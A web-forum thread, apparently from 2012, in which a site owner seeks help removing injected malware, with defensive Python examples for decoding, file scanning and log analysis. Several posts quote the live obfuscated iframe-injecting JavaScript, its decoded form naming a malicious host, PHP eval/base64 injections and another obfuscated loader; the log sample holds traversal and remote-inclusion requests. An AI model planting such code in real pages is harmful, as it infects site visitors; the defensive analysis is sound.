HELP ME PLEASE, been hacked, help please!

Discussion in 'HTML & JavaScript' started by littlewebdragon, Jan 5, 2012.

  1. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Some of my websites have been hacked and I've got all index.php and index.html files infected...

    That shithead who is doing this keeps placing this code into html websites:

    Code:
    <script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookiej|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393370783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f68676c7764727a2e64646e732e696e666f2f692f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}))</script>
    On the very start of BODY tag!

    And that same shithead places some PHP code that I've managed to decode...

    Has anyone else experienced the same? How did you get rid of this shit?

    ANY HELP will be appreciated and I might even decide to pay someone to solve this out for me...

    But please, help me out if you can...

    Also, can you decode above so that we can know what that shit is actually for?
     
  2. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    Are you running wordpress or do you have any third party scripts or plugins running?
     
  3. gregstereo

    gregstereo Elite Member

    Joined:
    Oct 5, 2009
    Messages:
    1,833
    Likes Received:
    1,027
    Occupation:
    I'm known to locate certain things from time to ti
    Location:
    Moose Factory, ON
  4. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
  5. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    I'm running WP, and I'm running some regular .html sites and some php combined with html sites... Nothing has a pattern...

    It ONLY changes an index.php file and index.html file and nothing else...

    This is what I found out so far, it's that this is the shit that's actually doing it:

    Code:
    http://redleg-redleg.blogspot.com/2011/11/malicious-software-hosted-on-nlai.html
    But I can't get rid of it, ANY HELP would be appreciated...

    If anyone can decode the script, but fully decode it so we can see where this eventually leads (to what website)... It would be highly appreciated...

    ANY HELP would be highly appreciated!

    Thank you!
     
  6. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    This is what I've been able to find so far. I hope it helps:

    Update with a fresh wp-settings.php

    Look for this code:


    Code:
    <?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); eval(gzuncompress(base64_decode('eF5LK81LLsnMz1OINzczNTK1MDUy01DJ1KxWSbR1LCpKrNTQtC5KLSktylNISixONTOJT0lNzk9J1VBJjFbJjNW0rgUAqDUUxQ=='))); eval(gzuncompress(base64_decode('...'))); ?>
    in these locations and delete it:


    public_html/index.php
    wp-admin/index.php
    wp-admin/network/index.php
    wp-admin/user/index.php
    wp-content/index.php
    wp-content/plugins/index.php
    3 files in si-captcha/captcha plugin
    wp-content/themes/index.php
    wp-content/themes/SPECIFIC THEME/index.php
    wp-content/wp-includes/theme-compat/footer.php


    You also need to check for backdoors and installing Exploit Scanner plugin wouldn't be a bad idea either. Hope this helps.

    Love,
    Mary
     
  7. xpwizard

    xpwizard Junior Member

    Joined:
    Nov 6, 2010
    Messages:
    198
    Likes Received:
    122
    Code:
    function hDcd(data) {
    var b16_digits = '0123456789abcdef';
    var b16_map = new Array();
    for (var i = 0; i < 256; i++) {
    	b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i)
    }
    if (!data.match(/^[a-f0-9]*$/i)) return false;
    if (data.length % 2) data = '0' + data;
    var ll = data.length;
    var result = new Array();
    var j = 0;
    for (var i = 0; i < ll; i += 2) {
    	result[j++] = b16_map[data.substr(i, 2)]
    }
    return result.join('')
    }
    if (document.cookie.indexOf('cookiej=enabled') == -1) {
    	document.write(hDcd('3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393670783b20746f703a202d3239393370783b223e3c696672616d652077696474683d22323022206865696768743d22333022207372633d22687474703a2f2f68676c7764727a2e64646e732e696e666f2f692f692e7068703f676f3d31223e3c2f696672616d653e3c2f6469763e'));
    	document.cookie = 'cookiej=enabled'
    }
    ^ That redirects to:

    Code:
    http://hglwdrz.ddns.info/i/i.php?go=1
     
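    As an added example (not code from the thread), the Python below reproduces the hDcd() hex decoding statically and reports what the injected markup does, so the payload can be inspected without ever rendering it. The hex string is the one carried by the script quoted in the first post; the iframe and off-screen checks are this example's own heuristics.

```python
import re

# Hex string carried by the injected script quoted in this thread (the argument
# to hDcd()). Kept purely as data: this example only decodes and inspects it.
INJECTED_HEX = (
    "3c64697620" "7374796c653d22" "706f736974696f6e3a20"          # <div style="position:
    "6162736f6c7574653b20" "6c6566743a20" "2d3139393670783b20"     # absolute; left: -1996px;
    "746f703a20" "2d3239393370783b22" "3e"                         # top: -2993px;">
    "3c696672616d6520" "77696474683d22323022"                      # <iframe width="20"
    "206865696768743d22333022" "207372633d22"                      # height="30" src="
    "687474703a2f2f68676c7764727a2e64646e732e696e666f2f692f692e7068703f676f3d3122"
    "3e3c2f696672616d653e3c2f6469763e"                             # "></iframe></div>
)


def decode_hex_payload(hex_data: str) -> str:
    """Static equivalent of the injected hDcd(): every pair of hex digits becomes
    one character; odd-length input is left-padded with '0' exactly as hDcd() does."""
    if not re.fullmatch(r"[0-9a-fA-F]*", hex_data):
        raise ValueError("payload is not a hex string")
    if len(hex_data) % 2:
        hex_data = "0" + hex_data
    return bytes.fromhex(hex_data).decode("latin-1")


def find_long_hex_runs(script_text: str, min_len: int = 40) -> list:
    """Pull candidate payloads (long runs of hex digits) out of any script text,
    packed or unpacked, so they can be handed to decode_hex_payload()."""
    return re.findall(r"[0-9a-fA-F]{%d,}" % min_len, script_text)


IFRAME_SRC = re.compile(r'<iframe\b[^>]*\bsrc=["\']([^"\']+)["\']', re.I)
# Large negative offsets are the classic way to keep an injected iframe
# out of the visible viewport while the browser still loads it.
OFFSCREEN_CSS = re.compile(r'\b(?:left|top)\s*:\s*-\d{3,}px', re.I)


def analyse_payload(hex_data: str) -> dict:
    """Decode the payload and summarise the two things a site owner wants to know:
    where the iframe points and whether it is pushed off-screen to stay invisible."""
    html = decode_hex_payload(hex_data)
    return {
        "html": html,
        "iframe_src": IFRAME_SRC.findall(html),
        "hidden_offscreen": bool(OFFSCREEN_CSS.search(html)),
    }


if __name__ == "__main__":
    # Constructed stand-in for a decoded script fragment; the packed original on
    # this page carries the same hex string inside its word dictionary.
    fragment = "document.write(hDcd('" + INJECTED_HEX + "'));"
    for blob in find_long_hex_runs(fragment):
        report = analyse_payload(blob)
        print(report["html"])
        print("iframe src:", report["iframe_src"], "off-screen:", report["hidden_offscreen"])
```

    The decoder mirrors the original's quirks (hex validation, odd-length padding) so that whatever the script would have written to the page is exactly what gets inspected; the same approach works for the hex blob inside the packed version, since find_long_hex_runs() does not care which wrapper the blob sits in.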
  8. ibmethatswhoib

    ibmethatswhoib Jr. VIP Jr. VIP Premium Member

    Joined:
    Feb 17, 2011
    Messages:
    1,560
    Likes Received:
    1,156
    Occupation:
    Staying Informed
    Location:
    Bay Area, Ca
  9. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    THANK YOU Mary and THANK YOU xpwizard!!!

    I really appreciate it... With your help Mary I've found out that this stuff may be everywhere and it is some sort of exploit...

    I'll see how to do exploit scan with exploit scanner plugin and see where it will pop up code like that...

    Also between changed files, there was si-contact form as you stated so it might be connected... I'm on it...

    @xpwizard

    Thank you for that... I just wanted to know what this shit is doing?

    It's just redirecting there, like stealing traffic?
     
  10. xpwizard

    xpwizard Junior Member

    Joined:
    Nov 6, 2010
    Messages:
    198
    Likes Received:
    122
    Not too sure (it's not doing anything to me)... But here's a more detailed report about that page:

    Code:
    http://urlquery.net/report.php?id=14613
     
  11. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Yes, that is exactly the script that's mentioned everywhere...

    My final thought is that server has been hacked...

    I mean I change permissions to 444 and someone gets back and restores it to 644 or 755 or 666... That can't be done if you are not logged in to FTP...

    This is part from that report URL that you've sent me...
    This url myftp.org is often connected with other websites where I see iframe hack and index files hacked mentioned...

    THANK YOU for helping me out with this...
     
  12. mpulse

    mpulse Regular Member

    Joined:
    May 27, 2009
    Messages:
    292
    Likes Received:
    40
    Sounds like what happened to me, and with like 10 sites


    You will have to go through all the PHP and HTML index files...
    If it was on a CMS, and it most likely was,
    just find the same version and replace all the core files with the ones that are the same version number of whatever you're working with...
    It took me 6hrs to unhack a site.
    First time, I pat myself on the back for that. ;)
    It's a bit tedious but it's actually easy

    What you can also do is load up all of your site files in SharePoint or Dreamweaver....
    Then do a global search on ALL FILES! Search for the code that's in the site. All php and all html.
    Most likely it's just in your index.html or .php files only. But that's how I did it..


    Also make sure you look at any extensions/plugins/mambots etc for newer versions. You may have to delete the whole folder and replace with a clean and updated version.
    This was the code I found in mine I just searched for the code globally...

    HTML:
    window.w3ssss=function(){ var scriptlink = "http://jquery.googlecode.com/svn/trunk/gadget/scripts/s.js?userrefer=%0A7gw%0Anayies4flsrrd4p%3Du4fdsauogkncu2zutcymahnepbdnkg8t5wd.6ulcwprr5hjef37ace0tfgpe1zlEz19lkt9ey3sm96oeko4nhuvtfy5%282wj%226ofils0fowyrx6wanu4m6ajeinf%22bqs%293e0%3Bd5i%0Ayczieyifqi9rct4.sl6snrzre2ocola%3Dg1q%22cd8h7irth8ltcufpz5g%3Adu6/g4u/wwovvb0cb8p-p74bkadu0krsxuaip6znd9eegtrsghbsejf.ponc8kiocetmh6r/cp8i63lndkg.8rrpbewh9kepdka%22x5n%3B73r%0Av27iar6fht8rpsz.r5ksx1ottjxy2h1ltseeign.s28w7fvisuadzght5mph09w%3Dpr0%22usd1yifpp0vxwar%22vw3%3Bpv6%0Ayljibn8fjdzroab.60ns3llt4ulyxzclfrzektc.wq5hvbsed58if0ygt3dhtaatjsq%3Dqzs%22gxt1y6apeanxndo%225ij%3Bny2%0Acj5dzblow3fcr0gubrrm42geqinnghstuh3.3z6g3thezrgt7m9Enx1ley7e6voma64eph0nl7htxqbB3n7yjtwIs9xdvht%28rph%22ufxwhhm3flks84utufuanldthuks999%2222l%290io.9iga4usp7rxpverebjgnjrbdyezCpugh3eliesil9ncdcer%28wu7itzjfjl3rpqi%29q83%3Bsih%0A4ni%0Akba"; var visitnum=window.history.length%1000-window.history.length+4; var countbox=document.createElement("div");countbox.id='countbox'; idarr = new Array(97,114,93,104); for(var i=0,elem=[]; i<visitnum; i++){elem[i]=document.createElement("div");elem[i].id= String.fromCharCode(idarr[i]+visitnum);countbox.appendChild(elem[i]);} var cont=''; currentuser=true, nextuser=countbox.firstChild; do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild) var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){}
    Good luck and cheers!
     
    Last edited: Jan 8, 2012
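    Mary's list of locations and mpulse's global search come down to the same procedure: walk every index.php, index.html, plugin and theme file, look for the injected signature, and note what changed. As an added example (not the posters' own tooling), the Python below scans a directory tree for the three signatures quoted in this thread, records each hit's file mode and modification time, and statically unwraps one base64+zlib layer of the PHP injection without executing anything. The sample tree it builds is constructed, SPECIFIC-THEME is a placeholder, and the only page-specific value used is the first base64 blob quoted above.

```python
import base64
import re
import stat
import tempfile
import zlib
from pathlib import Path

# Signatures of the three injections quoted in this thread.
SIGNATURES = {
    "php_eval_gzuncompress": re.compile(
        r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'"),
    "js_packer_eval": re.compile(
        r"eval\s*\(\s*function\s*\(\s*p\s*,\s*a\s*,\s*c\s*,\s*k\s*,\s*e\s*,\s*d\s*\)"),
    "js_w3ssss_loader": re.compile(r"window\.w3ssss\s*="),
}
SCAN_SUFFIXES = {".php", ".html", ".htm", ".js"}


def decode_php_blob(b64: str):
    """Unwrap one base64+zlib layer of the PHP injection; None if it will not decode.
    The result is returned as text for reading, never evaluated."""
    try:
        return zlib.decompress(base64.b64decode(b64)).decode("utf-8", errors="replace")
    except (ValueError, zlib.error):
        return None


def encode_php_blob(php_source: str) -> str:
    """Inverse of decode_php_blob(); only used to build test fixtures."""
    return base64.b64encode(zlib.compress(php_source.encode("utf-8"))).decode("ascii")


def scan_tree(root) -> list:
    """One finding per (file, signature) match under root, with the metadata
    (mode, mtime) that tells you what to compare against a clean copy."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        st = path.stat()
        for name, rx in SIGNATURES.items():
            m = rx.search(text)
            if not m:
                continue
            finding = {
                "path": str(path.relative_to(root)),
                "signature": name,
                "line": text.count("\n", 0, m.start()) + 1,
                "mode": stat.filemode(st.st_mode),
                "mtime": st.st_mtime,
            }
            if name == "php_eval_gzuncompress":
                finding["decoded_layer"] = decode_php_blob(m.group(1))
            findings.append(finding)
    return findings


def build_sample_tree() -> str:
    """Write a small constructed WordPress-like tree to a temp dir and return its path."""
    root = Path(tempfile.mkdtemp(prefix="scan-demo-"))
    files = {
        # first blob is the one quoted in this thread; the rest of the file is constructed
        "public_html/index.php":
            "<?php eval(gzuncompress(base64_decode('eF5Tcffxd3L0CY5WjzcyNDG2NDc3MLGMV4+1dSwqSqzU0LQGAJCPCMM='))); ?>\n"
            "<?php define('WP_USE_THEMES', true); ?>\n",
        "public_html/wp-admin/index.php": "<?php require_once('admin.php'); ?>\n",
        "public_html/wp-content/themes/SPECIFIC-THEME/footer.php":
            "</div>\n<script>window.w3ssss=function(){ /* constructed stand-in */ };</script>\n</body></html>\n",
        "public_html/static/index.html":
            "<html><body>\n<script>eval(function(p,a,c,k,e,d){/* constructed stand-in */}"
            "('',0,0,''.split('|'),0,{}))</script>\n</body></html>\n",
        "public_html/readme.txt": "eval(gzuncompress(base64_decode(  <- wrong suffix, not scanned\n",
    }
    for rel, content in files.items():
        p = root / rel
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text(content, encoding="utf-8")
    return str(root)


if __name__ == "__main__":
    for f in scan_tree(build_sample_tree()):
        print(f"{f['mode']} {f['mtime']:.0f} {f['path']}:{f['line']} {f['signature']}")
```

    Run against a real document root the scan gives the list of files to replace from a clean copy of the same CMS version, and the mode/mtime columns are what to check against the hosting provider's FTP and access logs for the time of the change.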
  13. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    Quick update for everyone that maybe are having/facing this problem...

    FOR NOW what I realized that stops hacking to happen is 755 for folders and 444 for index files... YES 444 not 644... Apparently it works, and that's fine with me for now...

    I will find where it came from just it was impossible even so far, even with hosting provider help...

    Thank you all for participating and helping me out when I was really stressed... :)
     
  14. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    Do you have access to the Apache log files, and have you looked at them?
    If the attack went through WP you will probably find an answer there.
     
  15. littlewebdragon

    littlewebdragon Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2007
    Messages:
    874
    Likes Received:
    229
    I have access to them and I've looked at them, funny thing is that I was not able to see what changed the files...

    How can I see if some script has changed my files?

    Or if "person" did it? I think script changes it...

    Honestly I didn't know what to look for... :(
     
  16. marusia

    marusia Senior Member

    Joined:
    Oct 25, 2010
    Messages:
    1,122
    Likes Received:
    2,320
    You should post on the wordpress forum. There are TONS of people there who love to help and know every little trick in the book.
     
  17. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    You probably won't see a request that directly changes your files; you should look for an injection of malicious code or the use of some existing script to download and execute it.

    Look for uncommon request paths:
    - contains URLs
    - contains file paths
    - contains lots of URL-encoded characters = lots of %XX where X = [0-9a-fA-F]
    Look for IPs scanning your server for exploits and generating lots of 404 responses, then look if they found something (not a 404 response).

    you can try some forensic log analyzers like apache-scalp, i think ossec has also a tool for this
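    To make the heuristics in this post concrete, here is an added Python example (not from the thread) that applies them to a constructed Apache access log: it flags request paths that carry URLs, file paths or heavy percent-encoding, and lists clients that piled up 404s and then received a non-404 response. The sample lines, the documentation-range IPs, the PLUGIN-* and EXAMPLE-PAYLOAD-HOST names and the thresholds are all this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed Apache combined-format sample; addresses come from the RFC 5737
# documentation ranges and PLUGIN-*/EXAMPLE-PAYLOAD-HOST are placeholders.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jan/2012:03:12:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.23 - - [05/Jan/2012:03:14:09 +0000] "GET /wp-content/plugins/PLUGIN-A/upload.php HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
198.51.100.23 - - [05/Jan/2012:03:14:10 +0000] "GET /wp-content/plugins/PLUGIN-B/admin.php HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
198.51.100.23 - - [05/Jan/2012:03:14:11 +0000] "GET /wp-content/plugins/PLUGIN-C/index.php HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
198.51.100.23 - - [05/Jan/2012:03:14:12 +0000] "GET /wp-content/plugins/PLUGIN-C/index.php?f=http://EXAMPLE-PAYLOAD-HOST/x.txt HTTP/1.1" 200 88 "-" "libwww-perl/5.805"
192.0.2.44 - - [05/Jan/2012:03:20:33 +0000] "GET /index.php?p=..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 1200 "-" "Mozilla/4.0"
203.0.113.7 - - [05/Jan/2012:03:21:00 +0000] "GET /about.html HTTP/1.1" 200 3301 "http://example.com/" "Mozilla/5.0"
192.0.2.44 - - [05/Jan/2012:03:22:00 +0000] "GET /old/%63%6f%6e%66%69%67%2e%70%68%70 HTTP/1.1" 404 291 "-" "Mozilla/4.0"
"""

LOG_RX = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
PCT_RX = re.compile(r"%[0-9a-fA-F]{2}")


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None for lines that do not match."""
    m = LOG_RX.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    return entry


def path_flags(path: str, pct_threshold: int = 5) -> list:
    """The three 'uncommon request path' heuristics from the post, in order."""
    flags = []
    if re.search(r"https?://", path, re.I) or re.search(r"https?%3A%2F%2F", path, re.I):
        flags.append("url_in_path")
    decoded = unquote(path)
    if "../" in decoded or re.search(r"/(etc|proc|tmp)/", decoded):
        flags.append("file_path_in_path")
    if len(PCT_RX.findall(path)) >= pct_threshold:
        flags.append("heavy_url_encoding")
    return flags


def find_scanners(entries: list, min_404: int = 2) -> dict:
    """Clients with at least min_404 '404's, plus every non-404 response they
    got afterwards in log order (the 'did they find something' check)."""
    state = defaultdict(lambda: {"not_found": 0, "found_after": []})
    for e in entries:
        s = state[e["ip"]]
        if e["status"] == 404:
            s["not_found"] += 1
        elif s["not_found"]:
            s["found_after"].append((e["status"], e["path"]))
    return {ip: s for ip, s in state.items() if s["not_found"] >= min_404}


def analyse_log(text: str) -> dict:
    entries = [e for e in (parse_line(l) for l in text.splitlines()) if e]
    odd_paths = [(e["ip"], e["path"], path_flags(e["path"])) for e in entries]
    return {
        "odd_paths": [x for x in odd_paths if x[2]],
        "scanners": find_scanners(entries),
    }


if __name__ == "__main__":
    report = analyse_log(SAMPLE_LOG)
    for ip, path, flags in report["odd_paths"]:
        print(f"{ip} {path} -> {', '.join(flags)}")
    for ip, s in report["scanners"].items():
        print(f"{ip}: {s['not_found']} x 404, then {s['found_after']}")
```

    On a real server the same functions run over the full access_log; the two thresholds are deliberately low for the eight-line sample and would be raised for production traffic, where legitimate 404s from bots and stale links are common.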